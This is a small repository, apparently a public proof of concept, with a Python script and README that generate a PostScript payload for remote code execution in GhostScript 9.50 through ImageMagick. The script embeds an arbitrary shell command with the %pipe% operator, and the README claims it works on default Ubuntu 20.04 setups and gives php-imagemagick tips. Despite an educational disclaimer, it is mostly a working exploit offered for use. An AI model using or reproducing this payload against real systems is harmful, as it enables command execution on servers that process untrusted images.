├── IM-RCE-via-GhostScript-9.5.py └── README.md /IM-RCE-via-GhostScript-9.5.py: -------------------------------------------------------------------------------- 1 | #from ducnt import <3 2 | import sys 3 | 4 | def genareate_payload(_cmd,_filename): 5 | 6 | _payload = """ copies (%pipe%/tmp/;{}) (r) file showpage 0 quit """.format(_cmd) 7 | f = open(_filename,"w+").write(_payload) 8 | return True 9 | 10 | def main(): 11 | if len(sys.argv) < 3: 12 | print "Usage: python IM-RCE-via-GhostScript-9.5.py

" 18 | 19 | if __name__ == "__main__": 20 | main() 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RCE-0-day-for-GhostScript-9.50 2 | 3 | ### PoC for RCE 0-day for GhostScript 9.50 - Payload generator 4 | ### The PoC in python generates payload when exploited for a 0-day of GhostScript 9.50. This 0-day exploit affect to ImageMagick with the default settings from Ubuntu repository (Tested with default settings of ImageMagick on Ubuntu 20.04) 5 | 6 | ### This project is created only for educational purposes and cannot be used for law violation or personal gain. 7 | ### The author of this project is not responsible for any possible harm caused by the materials of this project. 8 | 9 | ### Original finding and awesome research from Emil Lerner: https://twitter.com/emil_lerner/status/1430502815181463559 10 | 11 | ### Usage: `python IM-RCE-via-GhostScript-9.5.py

` 12 | 13 | ## Demo 14 |

15 | 16 | ## Noted for php-imagemagick, sometime you must find the correct `fd/`. The easiest way for doing this stuff is fuzzylogic and something like this (Tested with Ubuntu 20.04 and default php-imagemagick installed). 17 |

18 | 19 | --------------------------------------------------------------------------------